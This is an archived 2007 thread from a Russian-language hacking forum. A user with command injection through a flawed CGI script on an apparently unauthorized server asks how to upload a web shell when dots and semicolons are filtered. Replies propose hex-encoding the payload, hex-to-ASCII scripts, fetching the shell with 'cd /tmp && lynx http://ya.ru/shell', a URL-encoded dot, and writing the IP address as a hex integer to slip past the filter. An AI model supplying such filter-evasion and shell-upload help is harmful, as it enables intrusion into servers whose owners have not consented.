ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.03.2007, 17:39
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
/bin/bash хелп
Короче есть бага в cgi скрипте могу исполнять команды но не могу использывать .
Сначало думал что это куйн но потом понял что залить шелл просто не реально.
Да ; тоже нельзя.
Вопрос как залить шелл не используя точки. на серваке есть lynx из загрузчиков.
варианты извменить точку в чего либо (url кодировку не предлогать)
записать эхом в файл без точки в 2 или 16 коде потом утилитой перекодировать и исполнить как .sh
Как реалиховать у вас есть какие то идеи?
|
|
|
04.03.2007, 17:57
|
|
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме:
626169
Репутация:
167
|
|
Если я все правильно понял (хотя не уверен), то достаточно перевести команду в hex и залить шелл, если есть права на запись.
ha.ckers.org/xss.html
|
|
|
|
04.03.2007, 18:01
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
как перевести в хекс я знаю )
нужна утилита в стандартной поставке котороая могла бы текст в файле (допусти hex) преобраховать в нормальный. короче мне надо залить шелл не используя точки и точки с запятой.
|
|
|
|
04.03.2007, 18:12
|
|
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме:
626169
Репутация:
167
|
|
В стандартных утилитах такого, по-моему, нет. Для этого пишутся скрипты на bash или perl. Но его еще нужно туда залить.
www.computing.net/unix/wwwboard/forum/6894.html
Там несколько вариантов скриптов, переводящих hex в ascii.
|
|
|
|
04.03.2007, 18:32
|
|
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
Провел на форуме:
3730496
Репутация:
519
|
|
cd /tmp && lynx <url>
не выход?
|
|
|
|
04.03.2007, 18:34
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
cd /tmp && lynx http://ya.ru/shell
без точек...
|
|
|
|
04.03.2007, 18:38
|
|
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме:
626169
Репутация:
167
|
|
А cd /tmp && lynx http://ya%2Eru/shell ?
|
|
|
|
04.03.2007, 18:40
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
нет
варианты извменить точку в чего либо (url кодировку не предлогать)
читаем внимательней.
url приобразовываеться. и в конечном запросе . |
|
|
|
04.03.2007, 18:41
|
|
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
Провел на форуме:
3730496
Репутация:
519
|
|
Прийдется преобразовывать ип домена ya.ru в что-то вроде 0x34a2462d.
Хз, других идей у меня нет...
|
|
|
|
04.03.2007, 18:45
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
